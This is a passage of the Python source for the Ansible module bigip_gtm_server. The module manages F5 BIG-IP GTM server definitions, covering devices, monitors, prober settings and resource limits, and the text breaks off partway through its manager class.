nitzmahone/ansible | refs/heads/devel | lib/ansible/modules/network/f5/bigip_gtm_server.py | 4 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright: (c) 2017, F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'certified'}
DOCUMENTATION = r'''
---
module: bigip_gtm_server
short_description: Manages F5 BIG-IP GTM servers
description:
- Manage BIG-IP server configuration. This module is able to manipulate the server
definitions in a BIG-IP.
version_added: 2.5
options:
name:
description:
- The name of the server.
required: True
state:
description:
- The server state. If C(absent), an attempt to delete the server will be made.
This will only succeed if this server is not in use by a virtual server.
C(present) creates the server and enables it. If C(enabled), enable the server
if it exists. If C(disabled), create the server if needed, and set state to
C(disabled).
default: present
choices:
- present
- absent
- enabled
- disabled
datacenter:
description:
- Data center the server belongs to. When creating a new GTM server, this value
is required.
devices:
description:
- Lists the self IP addresses and translations for each device. When creating a
new GTM server, this value is required. This list is a complex list that
specifies a number of keys.
- The C(name) key specifies a name for the device. The device name must
be unique per server. This key is required.
- The C(address) key contains an IP address, or list of IP addresses, for the
destination server. This key is required.
- The C(translation) key contains an IP address to translate the C(address)
value above to. This key is optional.
- Specifying duplicate C(name) fields is a supported means of providing device
addresses. In this scenario, the addresses will be assigned to the C(name)'s list
of addresses.
server_type:
description:
- Specifies the server type. The server type determines the metrics that the
system can collect from the server. When creating a new GTM server, the default
value C(bigip) is used.
choices:
- alteon-ace-director
- cisco-css
- cisco-server-load-balancer
- generic-host
- radware-wsd
- windows-nt-4.0
- bigip
- cisco-local-director-v2
- extreme
- generic-load-balancer
- sun-solaris
- cacheflow
- cisco-local-director-v3
- foundry-server-iron
- netapp
- windows-2000-server
aliases:
- product
link_discovery:
description:
- Specifies whether the system auto-discovers the links for this server. When
creating a new GTM server, if this parameter is not specified, the default
value C(disabled) is used.
- If you set this parameter to C(enabled) or C(enabled-no-delete), you must
also ensure that the C(virtual_server_discovery) parameter is also set to
C(enabled) or C(enabled-no-delete).
choices:
- enabled
- disabled
- enabled-no-delete
virtual_server_discovery:
description:
- Specifies whether the system auto-discovers the virtual servers for this server.
When creating a new GTM server, if this parameter is not specified, the default
value C(disabled) is used.
choices:
- enabled
- disabled
- enabled-no-delete
partition:
description:
- Device partition to manage resources on.
default: Common
version_added: 2.5
iquery_options:
description:
- Specifies whether the Global Traffic Manager uses this BIG-IP
system to conduct a variety of probes before delegating traffic to it.
suboptions:
allow_path:
description:
- Specifies that the system verifies the logical network route between a data
center server and a local DNS server.
type: bool
allow_service_check:
description:
- Specifies that the system verifies that an application on a server is running,
by remotely running the application using an external service checker program.
type: bool
allow_snmp:
description:
- Specifies that the system checks the performance of a server running an SNMP
agent.
type: bool
version_added: 2.7
monitors:
description:
- Specifies the health monitors that the system currently uses to monitor this resource.
- When C(availability_requirements.type) is C(require), you may only have a single monitor in the
C(monitors) list.
version_added: 2.8
availability_requirements:
description:
- Specifies, if you activate more than one health monitor, the number of health
monitors that must receive successful responses in order for the link to be
considered available.
suboptions:
type:
description:
- Monitor rule type when C(monitors) is specified.
- When creating a new pool, if this value is not specified, the default of 'all' will be used.
choices: ['all', 'at_least', 'require']
at_least:
description:
- Specifies the minimum number of active health monitors that must be successful
before the link is considered up.
- This parameter is only relevant when a C(type) of C(at_least) is used.
- This parameter will be ignored if a type of either C(all) or C(require) is used.
number_of_probes:
description:
- Specifies the minimum number of probes that must succeed for this server to be declared up.
- When creating a new virtual server, if this parameter is specified, then the C(number_of_probers)
parameter must also be specified.
- The value of this parameter should always be B(lower) than, or B(equal to), the value of C(number_of_probers).
- This parameter is only relevant when a C(type) of C(require) is used.
- This parameter will be ignored if a type of either C(all) or C(at_least) is used.
number_of_probers:
description:
- Specifies the number of probers that should be used when running probes.
- When creating a new virtual server, if this parameter is specified, then the C(number_of_probes)
parameter must also be specified.
          - The value of this parameter should always be B(higher) than, or B(equal to), the value of C(number_of_probes).
- This parameter is only relevant when a C(type) of C(require) is used.
- This parameter will be ignored if a type of either C(all) or C(at_least) is used.
version_added: 2.8
prober_preference:
description:
- Specifies the type of prober to use to monitor this server's resources.
- This option is ignored in C(TMOS) version C(12.x).
- From C(TMOS) version C(13.x) and up, when prober_preference is set to C(pool)
a C(prober_pool) parameter must be specified.
choices:
- inside-datacenter
- outside-datacenter
- inherit
- pool
version_added: 2.8
prober_fallback:
description:
- Specifies the type of prober to use to monitor this server's resources
when the preferred prober is not available.
- This option is ignored in C(TMOS) version C(12.x).
- From C(TMOS) version C(13.x) and up, when prober_preference is set to C(pool)
a C(prober_pool) parameter must be specified.
- The choices are mutually exclusive with prober_preference parameter,
with the exception of C(any-available) or C(none) option.
choices:
- any
- inside-datacenter
- outside-datacenter
- inherit
- pool
- none
version_added: 2.8
prober_pool:
description:
- Specifies the name of the prober pool to use to monitor this server's resources.
- From C(TMOS) version C(13.x) and up, this parameter is mandatory when C(prober_preference) is set to C(pool).
- Format of the name can be either be prepended by partition (C(/Common/foo)), or specified
just as an object name (C(foo)).
- In C(TMOS) version C(12.x) prober_pool can be set to empty string to revert to default setting of inherit.
version_added: 2.8
limits:
description:
- Specifies resource thresholds or limit requirements at the pool member level.
- When you enable one or more limit settings, the system then uses that data to take
members in and out of service.
- You can define limits for any or all of the limit settings. However, when a
member does not meet the resource threshold limit requirement, the system marks
the member as unavailable and directs load-balancing traffic to another resource.
version_added: 2.8
suboptions:
bits_enabled:
description:
- Whether the bits limit it enabled or not.
- This parameter allows you to switch on or off the effect of the limit.
type: bool
packets_enabled:
description:
- Whether the packets limit it enabled or not.
- This parameter allows you to switch on or off the effect of the limit.
type: bool
connections_enabled:
description:
- Whether the current connections limit it enabled or not.
- This parameter allows you to switch on or off the effect of the limit.
type: bool
cpu_enabled:
description:
- Whether the CPU limit it enabled or not.
- This parameter allows you to switch on or off the effect of the limit.
type: bool
memory_enabled:
description:
- Whether the memory limit it enabled or not.
- This parameter allows you to switch on or off the effect of the limit.
type: bool
bits_limit:
description:
- Specifies the maximum allowable data throughput rate, in bits per second,
for the member.
- If the network traffic volume exceeds this limit, the system marks the
member as unavailable.
packets_limit:
description:
- Specifies the maximum allowable data transfer rate, in packets per second,
for the member.
- If the network traffic volume exceeds this limit, the system marks the
member as unavailable.
connections_limit:
description:
- Specifies the maximum number of concurrent connections, combined, for all of
the member.
- If the connections exceed this limit, the system marks the server as
unavailable.
cpu_limit:
description:
- Specifies the percent of CPU usage.
- If percent of CPU usage goes above the limit, the system marks the server as unavailable.
memory_limit:
description:
- Specifies the available memory required by the virtual servers on the server.
- If available memory falls below this limit, the system marks the server as unavailable.
extends_documentation_fragment: f5
author:
- Robert Teller (@r-teller)
- Tim Rupp (@caphrim007)
- Wojciech Wypior (@wojtek0806)
'''
EXAMPLES = r'''
- name: Create server "GTM_Server"
bigip_gtm_server:
server: lb.mydomain.com
user: admin
password: secret
name: GTM_Server
datacenter: /Common/New York
server_type: bigip
link_discovery: disabled
virtual_server_discovery: disabled
devices:
- {'name': 'server_1', 'address': '1.1.1.1'}
- {'name': 'server_2', 'address': '2.2.2.1', 'translation':'192.168.2.1'}
- {'name': 'server_2', 'address': '2.2.2.2'}
- {'name': 'server_3', 'addresses': [{'address':'3.3.3.1'},{'address':'3.3.3.2'}]}
- {'name': 'server_4', 'addresses': [{'address':'4.4.4.1','translation':'192.168.14.1'}, {'address':'4.4.4.2'}]}
delegate_to: localhost
- name: Create server "GTM_Server" with expanded keys
bigip_gtm_server:
server: lb.mydomain.com
user: admin
password: secret
name: GTM_Server
datacenter: /Common/New York
server_type: bigip
link_discovery: disabled
virtual_server_discovery: disabled
devices:
- name: server_1
address: 1.1.1.1
- name: server_2
address: 2.2.2.1
translation: 192.168.2.1
- name: server_2
address: 2.2.2.2
- name: server_3
addresses:
- address: 3.3.3.1
- address: 3.3.3.2
- name: server_4
addresses:
- address: 4.4.4.1
translation: 192.168.14.1
- address: 4.4.4.2
delegate_to: localhost
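
# Illustrative sketch only: the monitor, datacenter, and limit values below are
# made-up placeholders, not recommendations.
- name: Create server "GTM_Server" with monitors and limits
  bigip_gtm_server:
    server: lb.mydomain.com
    user: admin
    password: secret
    name: GTM_Server
    datacenter: /Common/New York
    server_type: bigip
    link_discovery: disabled
    virtual_server_discovery: disabled
    devices:
      - name: server_1
        address: 1.1.1.1
    monitors:
      - /Common/gateway_icmp
    availability_requirements:
      type: at_least
      at_least: 1
    limits:
      bits_enabled: yes
      bits_limit: 100
  delegate_to: localhost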
'''
RETURN = r'''
bits_enabled:
description: Whether the bits limit is enabled.
returned: changed
type: bool
sample: yes
bits_limit:
description: The new bits_enabled limit.
returned: changed
type: int
sample: 100
connections_enabled:
description: Whether the connections limit is enabled.
returned: changed
type: bool
sample: yes
connections_limit:
description: The new connections_limit limit.
returned: changed
type: int
sample: 100
monitors:
description: The new list of monitors for the resource.
returned: changed
type: list
sample: ['/Common/monitor1', '/Common/monitor2']
link_discovery:
description: The new C(link_discovery) configured on the remote device.
returned: changed
type: string
sample: enabled
virtual_server_discovery:
description: The new C(virtual_server_discovery) name for the trap destination.
returned: changed
type: string
sample: disabled
server_type:
description: The new type of the server.
returned: changed
type: string
sample: bigip
datacenter:
description: The new C(datacenter) which the server is part of.
returned: changed
type: string
sample: datacenter01
packets_enabled:
description: Whether the packets limit is enabled.
returned: changed
type: bool
sample: yes
packets_limit:
description: The new packets_limit limit.
returned: changed
type: int
sample: 100
'''
import re
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.basic import env_fallback
from distutils.version import LooseVersion
try:
from library.module_utils.network.f5.bigip import F5RestClient
from library.module_utils.network.f5.common import F5ModuleError
from library.module_utils.network.f5.common import AnsibleF5Parameters
from library.module_utils.network.f5.common import cleanup_tokens
from library.module_utils.network.f5.common import fq_name
from library.module_utils.network.f5.common import f5_argument_spec
from library.module_utils.network.f5.common import transform_name
from library.module_utils.network.f5.common import exit_json
from library.module_utils.network.f5.common import fail_json
from library.module_utils.network.f5.common import is_empty_list
from library.module_utils.network.f5.icontrol import tmos_version
from library.module_utils.network.f5.icontrol import module_provisioned
except ImportError:
from ansible.module_utils.network.f5.bigip import F5RestClient
from ansible.module_utils.network.f5.common import F5ModuleError
from ansible.module_utils.network.f5.common import AnsibleF5Parameters
from ansible.module_utils.network.f5.common import cleanup_tokens
from ansible.module_utils.network.f5.common import fq_name
from ansible.module_utils.network.f5.common import f5_argument_spec
from ansible.module_utils.network.f5.common import transform_name
from ansible.module_utils.network.f5.common import exit_json
from ansible.module_utils.network.f5.common import fail_json
from ansible.module_utils.network.f5.common import is_empty_list
from ansible.module_utils.network.f5.icontrol import tmos_version
from ansible.module_utils.network.f5.icontrol import module_provisioned
try:
from collections import OrderedDict
except ImportError:
try:
from ordereddict import OrderedDict
except ImportError:
pass
class Parameters(AnsibleF5Parameters):
api_map = {
'product': 'server_type',
'virtualServerDiscovery': 'virtual_server_discovery',
'linkDiscovery': 'link_discovery',
'addresses': 'devices',
'iqAllowPath': 'iquery_allow_path',
'iqAllowServiceCheck': 'iquery_allow_service_check',
'iqAllowSnmp': 'iquery_allow_snmp',
'monitor': 'monitors',
'proberPreference': 'prober_preference',
'proberPool': 'prober_pool',
'proberFallback': 'prober_fallback',
'limitMaxBps': 'bits_limit',
'limitMaxBpsStatus': 'bits_enabled',
'limitMaxConnections': 'connections_limit',
'limitMaxConnectionsStatus': 'connections_enabled',
'limitMaxPps': 'packets_limit',
'limitMaxPpsStatus': 'packets_enabled',
'limitCpuUsage': 'cpu_limit',
'limitCpuUsageStatus': 'cpu_enabled',
'limitMemAvail': 'memory_limit',
'limitMemAvailStatus': 'memory_enabled',
}
api_attributes = [
'linkDiscovery',
'virtualServerDiscovery',
'product',
'addresses',
'datacenter',
'enabled',
'disabled',
'iqAllowPath',
'iqAllowServiceCheck',
'iqAllowSnmp',
'monitor',
'proberPreference',
'proberPool',
'proberFallback',
'limitMaxBps',
'limitMaxBpsStatus',
'limitMaxConnections',
'limitMaxConnectionsStatus',
'limitMaxPps',
'limitMaxPpsStatus',
'limitCpuUsage',
'limitCpuUsageStatus',
'limitMemAvail',
'limitMemAvailStatus',
]
updatables = [
'link_discovery',
'virtual_server_discovery',
'server_type_and_devices',
'datacenter',
'state',
'iquery_allow_path',
'iquery_allow_service_check',
'iquery_allow_snmp',
'monitors',
'prober_preference',
'prober_pool',
'prober_fallback',
'bits_enabled',
'bits_limit',
'connections_enabled',
'connections_limit',
'packets_enabled',
'packets_limit',
'cpu_enabled',
'cpu_limit',
'memory_enabled',
'memory_limit',
]
returnables = [
'link_discovery',
'virtual_server_discovery',
'server_type',
'datacenter',
'enabled',
'iquery_allow_path',
'iquery_allow_service_check',
'iquery_allow_snmp',
'devices',
'monitors',
'availability_requirements',
'prober_preference',
'prober_pool',
'prober_fallback',
'bits_enabled',
'bits_limit',
'connections_enabled',
'connections_limit',
'packets_enabled',
'packets_limit',
'cpu_enabled',
'cpu_limit',
'memory_enabled',
'memory_limit',
]
class ApiParameters(Parameters):
@property
def devices(self):
if self._values['devices'] is None:
return None
return self._values['devices']
@property
def server_type(self):
if self._values['server_type'] is None:
return None
elif self._values['server_type'] in ['single-bigip', 'redundant-bigip']:
return 'bigip'
else:
return self._values['server_type']
@property
def raw_server_type(self):
if self._values['server_type'] is None:
return None
return self._values['server_type']
@property
def enabled(self):
if self._values['enabled'] is None:
return None
return True
@property
def disabled(self):
if self._values['disabled'] is None:
return None
return True
@property
def iquery_allow_path(self):
if self._values['iquery_allow_path'] is None:
return None
elif self._values['iquery_allow_path'] == 'yes':
return True
return False
@property
def iquery_allow_service_check(self):
if self._values['iquery_allow_service_check'] is None:
return None
elif self._values['iquery_allow_service_check'] == 'yes':
return True
return False
@property
def iquery_allow_snmp(self):
if self._values['iquery_allow_snmp'] is None:
return None
elif self._values['iquery_allow_snmp'] == 'yes':
return True
return False
@property
def availability_requirement_type(self):
if self._values['monitors'] is None:
return None
if 'min ' in self._values['monitors']:
return 'at_least'
elif 'require ' in self._values['monitors']:
return 'require'
else:
return 'all'
@property
def monitors_list(self):
if self._values['monitors'] is None:
return []
try:
result = re.findall(r'/\w+/[^\s}]+', self._values['monitors'])
result.sort()
return result
except Exception:
return self._values['monitors']
@property
def monitors(self):
if self._values['monitors'] is None:
return None
if self._values['monitors'] == '/Common/bigip':
return '/Common/bigip'
monitors = [fq_name(self.partition, x) for x in self.monitors_list]
if self.availability_requirement_type == 'at_least':
monitors = ' '.join(monitors)
result = 'min {0} of {{ {1} }}'.format(self.at_least, monitors)
elif self.availability_requirement_type == 'require':
monitors = ' '.join(monitors)
result = 'require {0} from {1} {{ {2} }}'.format(self.number_of_probes, self.number_of_probers, monitors)
else:
result = ' and '.join(monitors).strip()
return result
@property
def number_of_probes(self):
"""Returns the probes value from the monitor string.
The monitor string for a Require monitor looks like this.
require 1 from 2 { /Common/tcp }
        This method parses out the first of the numeric values. This value represents
the "probes" value that can be updated in the module.
Returns:
int: The probes value if found. None otherwise.
"""
if self._values['monitors'] is None:
return None
pattern = r'require\s+(?P<probes>\d+)\s+from'
matches = re.search(pattern, self._values['monitors'])
if matches is None:
return None
return matches.group('probes')
@property
def number_of_probers(self):
"""Returns the probers value from the monitor string.
The monitor string for a Require monitor looks like this.
require 1 from 2 { /Common/tcp }
        This method parses out the second of the numeric values. This value represents
the "probers" value that can be updated in the module.
Returns:
int: The probers value if found. None otherwise.
"""
if self._values['monitors'] is None:
return None
pattern = r'require\s+\d+\s+from\s+(?P<probers>\d+)\s+'
matches = re.search(pattern, self._values['monitors'])
if matches is None:
return None
return matches.group('probers')
@property
def at_least(self):
"""Returns the 'at least' value from the monitor string.
        The monitor string for an 'at least' monitor looks like this.
min 1 of { /Common/gateway_icmp }
        This method parses out the numeric value. This value represents
the "at_least" value that can be updated in the module.
Returns:
int: The at_least value if found. None otherwise.
"""
if self._values['monitors'] is None:
return None
pattern = r'min\s+(?P<least>\d+)\s+of\s+'
matches = re.search(pattern, self._values['monitors'])
if matches is None:
return None
return matches.group('least')
class ModuleParameters(Parameters):
def _get_limit_value(self, type):
if self._values['limits'] is None:
return None
if self._values['limits'][type] is None:
return None
return int(self._values['limits'][type])
def _get_limit_status(self, type):
if self._values['limits'] is None:
return None
if self._values['limits'][type] is None:
return None
if self._values['limits'][type]:
return 'enabled'
return 'disabled'
@property
def devices(self):
if self._values['devices'] is None:
return None
result = []
for device in self._values['devices']:
if not any(x for x in ['address', 'addresses'] if x in device):
raise F5ModuleError(
"The specified device list must contain an 'address' or 'addresses' key"
)
if 'address' in device:
translation = self._determine_translation(device)
name = device['address']
device_name = device['name']
result.append({
'name': name,
'deviceName': device_name,
'translation': translation
})
elif 'addresses' in device:
for address in device['addresses']:
translation = self._determine_translation(address)
name = address['address']
device_name = device['name']
result.append({
'name': name,
'deviceName': device_name,
'translation': translation
})
return result
@property
def enabled(self):
if self._values['state'] in ['present', 'enabled']:
return True
return False
@property
def datacenter(self):
if self._values['datacenter'] is None:
return None
return fq_name(self.partition, self._values['datacenter'])
def _determine_translation(self, device):
if 'translation' not in device:
return 'none'
return device['translation']
@property
def state(self):
if self._values['state'] == 'enabled':
return 'present'
return self._values['state']
@property
def iquery_allow_path(self):
if self._values['iquery_options'] is None:
return None
elif self._values['iquery_options']['allow_path'] is None:
return None
return self._values['iquery_options']['allow_path']
@property
def iquery_allow_service_check(self):
if self._values['iquery_options'] is None:
return None
elif self._values['iquery_options']['allow_service_check'] is None:
return None
return self._values['iquery_options']['allow_service_check']
@property
def iquery_allow_snmp(self):
if self._values['iquery_options'] is None:
return None
elif self._values['iquery_options']['allow_snmp'] is None:
return None
return self._values['iquery_options']['allow_snmp']
@property
def monitors_list(self):
if self._values['monitors'] is None:
return []
try:
result = re.findall(r'/\w+/[^\s}]+', self._values['monitors'])
result.sort()
return result
except Exception:
return self._values['monitors']
@property
def monitors(self):
if self._values['monitors'] is None:
return None
if is_empty_list(self._values['monitors']):
return '/Common/bigip'
monitors = [fq_name(self.partition, x) for x in self.monitors_list]
if self.availability_requirement_type == 'at_least':
if self.at_least > len(self.monitors_list):
raise F5ModuleError(
"The 'at_least' value must not exceed the number of 'monitors'."
)
monitors = ' '.join(monitors)
result = 'min {0} of {{ {1} }}'.format(self.at_least, monitors)
elif self.availability_requirement_type == 'require':
monitors = ' '.join(monitors)
if self.number_of_probes > self.number_of_probers:
raise F5ModuleError(
"The 'number_of_probes' must not exceed the 'number_of_probers'."
)
result = 'require {0} from {1} {{ {2} }}'.format(self.number_of_probes, self.number_of_probers, monitors)
else:
result = ' and '.join(monitors).strip()
return result
def _get_availability_value(self, type):
if self._values['availability_requirements'] is None:
return None
if self._values['availability_requirements'][type] is None:
return None
return int(self._values['availability_requirements'][type])
@property
def availability_requirement_type(self):
if self._values['availability_requirements'] is None:
return None
return self._values['availability_requirements']['type']
@property
def number_of_probes(self):
return self._get_availability_value('number_of_probes')
@property
def number_of_probers(self):
return self._get_availability_value('number_of_probers')
@property
def at_least(self):
return self._get_availability_value('at_least')
@property
def prober_pool(self):
if self._values['prober_pool'] is None:
return None
if self._values['prober_pool'] == '':
return self._values['prober_pool']
result = fq_name(self.partition, self._values['prober_pool'])
return result
@property
def prober_fallback(self):
if self._values['prober_fallback'] == 'any':
return 'any-available'
return self._values['prober_fallback']
@property
def bits_limit(self):
return self._get_limit_value('bits_limit')
@property
def packets_limit(self):
return self._get_limit_value('packets_limit')
@property
def connections_limit(self):
return self._get_limit_value('connections_limit')
@property
def cpu_limit(self):
return self._get_limit_value('cpu_limit')
@property
def memory_limit(self):
return self._get_limit_value('memory_limit')
@property
def bits_enabled(self):
return self._get_limit_status('bits_enabled')
@property
def packets_enabled(self):
return self._get_limit_status('packets_enabled')
@property
def connections_enabled(self):
return self._get_limit_status('connections_enabled')
@property
def cpu_enabled(self):
return self._get_limit_status('cpu_enabled')
@property
def memory_enabled(self):
return self._get_limit_status('memory_enabled')
class Changes(Parameters):
def to_return(self):
result = {}
for returnable in self.returnables:
result[returnable] = getattr(self, returnable)
result = self._filter_params(result)
return result
class UsableChanges(Changes):
@property
def monitors(self):
monitor_string = self._values['monitors']
if monitor_string is None:
return None
        if '{' in monitor_string and '}' in monitor_string:
tmp = monitor_string.strip('}').split('{')
monitor = ''.join(tmp).rstrip()
return monitor
return monitor_string
@property
def iquery_allow_path(self):
if self._values['iquery_allow_path'] is None:
return None
elif self._values['iquery_allow_path']:
return 'yes'
return 'no'
@property
def iquery_allow_service_check(self):
if self._values['iquery_allow_service_check'] is None:
return None
elif self._values['iquery_allow_service_check']:
return 'yes'
return 'no'
@property
def iquery_allow_snmp(self):
if self._values['iquery_allow_snmp'] is None:
return None
elif self._values['iquery_allow_snmp']:
return 'yes'
return 'no'
class ReportableChanges(Changes):
@property
def server_type(self):
if self._values['server_type'] in ['single-bigip', 'redundant-bigip']:
return 'bigip'
return self._values['server_type']
@property
def monitors(self):
if self._values['monitors'] is None:
return []
try:
result = re.findall(r'/\w+/[^\s}]+', self._values['monitors'])
result.sort()
return result
except Exception:
return self._values['monitors']
@property
def availability_requirement_type(self):
if self._values['monitors'] is None:
return None
if 'min ' in self._values['monitors']:
return 'at_least'
elif 'require ' in self._values['monitors']:
return 'require'
else:
return 'all'
@property
def number_of_probes(self):
"""Returns the probes value from the monitor string.
The monitor string for a Require monitor looks like this.
require 1 from 2 { /Common/tcp }
        This method parses out the first of the numeric values. This value represents
        the "probes" value that can be updated in the module.
Returns:
int: The probes value if found. None otherwise.
"""
if self._values['monitors'] is None:
return None
pattern = r'require\s+(?P<probes>\d+)\s+from'
matches = re.search(pattern, self._values['monitors'])
if matches is None:
return None
return int(matches.group('probes'))
@property
def number_of_probers(self):
"""Returns the probers value from the monitor string.
The monitor string for a Require monitor looks like this.
require 1 from 2 { /Common/tcp }
        This method parses out the second of the numeric values. This value represents
        the "probers" value that can be updated in the module.
Returns:
int: The probers value if found. None otherwise.
"""
if self._values['monitors'] is None:
return None
pattern = r'require\s+\d+\s+from\s+(?P<probers>\d+)\s+'
matches = re.search(pattern, self._values['monitors'])
if matches is None:
return None
return int(matches.group('probers'))
@property
def at_least(self):
"""Returns the 'at least' value from the monitor string.
        The monitor string for an 'at_least' monitor looks like this.
        min 1 of { /Common/gateway_icmp }
        This method parses out the numeric value. This value represents
        the "at_least" value that can be updated in the module.
Returns:
int: The at_least value if found. None otherwise.
"""
if self._values['monitors'] is None:
return None
pattern = r'min\s+(?P<least>\d+)\s+of\s+'
matches = re.search(pattern, self._values['monitors'])
if matches is None:
return None
return int(matches.group('least'))
@property
def availability_requirements(self):
if self._values['monitors'] is None:
return None
result = dict()
result['type'] = self.availability_requirement_type
result['at_least'] = self.at_least
result['number_of_probers'] = self.number_of_probers
result['number_of_probes'] = self.number_of_probes
return result
@property
def prober_fallback(self):
if self._values['prober_fallback'] == 'any-available':
return 'any'
return self._values['prober_fallback']
class Difference(object):
def __init__(self, want, have=None):
self.want = want
self.have = have
def compare(self, param):
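        # Prefer a purpose-built property named after the parameter; fall back
        # to a plain want/have comparison when no such property exists.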
try:
result = getattr(self, param)
return result
except AttributeError:
return self.__default(param)
def __default(self, param):
want = getattr(self.want, param)
try:
have = getattr(self.have, param)
if want != have:
return want
except AttributeError:
return want
def _discovery_constraints(self):
if self.want.virtual_server_discovery is None:
virtual_server_discovery = self.have.virtual_server_discovery
else:
virtual_server_discovery = self.want.virtual_server_discovery
if self.want.link_discovery is None:
link_discovery = self.have.link_discovery
else:
link_discovery = self.want.link_discovery
if link_discovery in ['enabled', 'enabled-no-delete'] and virtual_server_discovery == 'disabled':
raise F5ModuleError(
"Virtual server discovery must be enabled if link discovery is enabled"
)
def _devices_changed(self):
if self.want.devices is None and self.want.server_type is None:
return None
if self.want.devices is None:
devices = self.have.devices
else:
devices = self.want.devices
if self.have.devices is None:
have_devices = []
else:
have_devices = self.have.devices
if len(devices) == 0:
raise F5ModuleError(
"A GTM server must have at least one device associated with it."
)
want = [OrderedDict(sorted(d.items())) for d in devices]
have = [OrderedDict(sorted(d.items())) for d in have_devices]
if want != have:
return True
return False
def _server_type_changed(self):
if self.want.server_type is None:
self.want.update({'server_type': self.have.server_type})
if self.want.server_type != self.have.server_type:
return True
return False
@property
def link_discovery(self):
self._discovery_constraints()
if self.want.link_discovery != self.have.link_discovery:
return self.want.link_discovery
@property
def virtual_server_discovery(self):
self._discovery_constraints()
if self.want.virtual_server_discovery != self.have.virtual_server_discovery:
return self.want.virtual_server_discovery
def _handle_current_server_type_and_devices(self, devices_change, server_change):
result = {}
if devices_change:
result['devices'] = self.want.devices
if server_change:
result['server_type'] = self.want.server_type
return result
def _handle_legacy_server_type_and_devices(self, devices_change, server_change):
result = {}
if server_change and devices_change:
result['devices'] = self.want.devices
if len(self.want.devices) > 1 and self.want.server_type == 'bigip':
if self.have.raw_server_type != 'redundant-bigip':
result['server_type'] = 'redundant-bigip'
elif self.want.server_type == 'bigip':
if self.have.raw_server_type != 'single-bigip':
result['server_type'] = 'single-bigip'
else:
result['server_type'] = self.want.server_type
elif devices_change:
result['devices'] = self.want.devices
if len(self.want.devices) > 1 and self.have.server_type == 'bigip':
if self.have.raw_server_type != 'redundant-bigip':
result['server_type'] = 'redundant-bigip'
elif self.have.server_type == 'bigip':
if self.have.raw_server_type != 'single-bigip':
result['server_type'] = 'single-bigip'
else:
result['server_type'] = self.want.server_type
elif server_change:
if len(self.have.devices) > 1 and self.want.server_type == 'bigip':
if self.have.raw_server_type != 'redundant-bigip':
result['server_type'] = 'redundant-bigip'
elif self.want.server_type == 'bigip':
if self.have.raw_server_type != 'single-bigip':
result['server_type'] = 'single-bigip'
else:
result['server_type'] = self.want.server_type
return result
@property
def server_type_and_devices(self):
"""Compares difference between server type and devices list
These two parameters are linked with each other and, therefore, must be
compared together to ensure that the correct setting is sent to BIG-IP
:return:
"""
devices_change = self._devices_changed()
server_change = self._server_type_changed()
if not devices_change and not server_change:
return None
tmos = tmos_version(self.client)
if LooseVersion(tmos) >= LooseVersion('13.0.0'):
result = self._handle_current_server_type_and_devices(
devices_change, server_change
)
return result
else:
result = self._handle_legacy_server_type_and_devices(
devices_change, server_change
)
return result
@property
def state(self):
if self.want.state == 'disabled' and self.have.enabled:
return dict(disabled=True)
elif self.want.state in ['present', 'enabled'] and self.have.disabled:
return dict(enabled=True)
@property
def monitors(self):
if self.want.monitors is None:
return None
if self.want.monitors == '/Common/bigip' and self.have.monitors == '/Common/bigip':
return None
if self.want.monitors == '/Common/bigip' and self.have.monitors is None:
return None
if self.want.monitors == '/Common/bigip' and len(self.have.monitors) > 0:
return '/Common/bigip'
if self.have.monitors is None:
return self.want.monitors
if self.have.monitors != self.want.monitors:
return self.want.monitors
@property
def prober_pool(self):
if self.want.prober_pool is None:
return None
if self.have.prober_pool is None:
if self.want.prober_pool == '':
return None
if self.want.prober_pool != self.have.prober_pool:
return self.want.prober_pool
@property
def prober_preference(self):
if self.want.prober_preference is None:
return None
if self.want.prober_preference == self.have.prober_preference:
return None
if self.want.prober_preference == 'pool' and self.want.prober_pool is None:
raise F5ModuleError(
"A prober_pool needs to be set if prober_preference is set to 'pool'"
)
if self.want.prober_preference != 'pool' and self.have.prober_preference == 'pool':
if self.want.prober_fallback != 'pool' and self.want.prober_pool != '':
raise F5ModuleError(
"To change prober_preference from {0} to {1}, set prober_pool to an empty string".format(
self.have.prober_preference,
self.want.prober_preference
)
)
if self.want.prober_preference == self.want.prober_fallback:
raise F5ModuleError(
"Prober_preference and prober_fallback must not be equal."
)
if self.want.prober_preference == self.have.prober_fallback:
raise F5ModuleError(
"Cannot set prober_preference to {0} if prober_fallback on device is set to {1}.".format(
self.want.prober_preference,
self.have.prober_fallback
)
)
if self.want.prober_preference != self.have.prober_preference:
return self.want.prober_preference
@property
def prober_fallback(self):
if self.want.prober_fallback is None:
return None
if self.want.prober_fallback == self.have.prober_fallback:
return None
if self.want.prober_fallback == 'pool' and self.want.prober_pool is None:
raise F5ModuleError(
"A prober_pool needs to be set if prober_fallback is set to 'pool'"
)
if self.want.prober_fallback != 'pool' and self.have.prober_fallback == 'pool':
if self.want.prober_preference != 'pool' and self.want.prober_pool != '':
raise F5ModuleError(
"To change prober_fallback from {0} to {1}, set prober_pool to an empty string".format(
self.have.prober_fallback,
self.want.prober_fallback
)
)
if self.want.prober_preference == self.want.prober_fallback:
raise F5ModuleError(
"Prober_preference and prober_fallback must not be equal."
)
if self.want.prober_fallback == self.have.prober_preference:
raise F5ModuleError(
"Cannot set prober_fallback to {0} if prober_preference on device is set to {1}.".format(
self.want.prober_fallback,
self.have.prober_preference
)
)
if self.want.prober_fallback != self.have.prober_fallback:
return self.want.prober_fallback
class ModuleManager(object):
def __init__(self, *args, **kwargs):
self.module = kwargs.get('module', None)
self.client = kwargs.get('client', None)
self.kwargs = kwargs
def exec_module(self):
if not module_provisioned(self.client, 'gtm'):
raise F5ModuleError(
"GTM must be provisioned to use this module."
)
if self.version_is_less_than('13.0.0'):
manager = self.get_manager('v1')
else:
manager = self.get_manager('v2')
return manager.exec_module()
def get_manager(self, type):
if type == 'v1':
return V1Manager(**self.kwargs)
elif type == 'v2':
return V2Manager(**self.kwargs)
def version_is_less_than(self, version):
tmos = tmos_version(self.client)
if LooseVersion(tmos) < LooseVersion(version):
return True
else:
return False
class BaseManager(object):
def __init__(self, *args, **kwargs):
self.module = kwargs.get('module', None)
self.client = kwargs.get('client', None)
self.want = ModuleParameters(params=self.module.params)
self.want.update(dict(client=self.client))
self.have = ApiParameters()
self.changes = UsableChanges()
def _set_changed_options(self):
changed = {}
for key in Parameters.returnables:
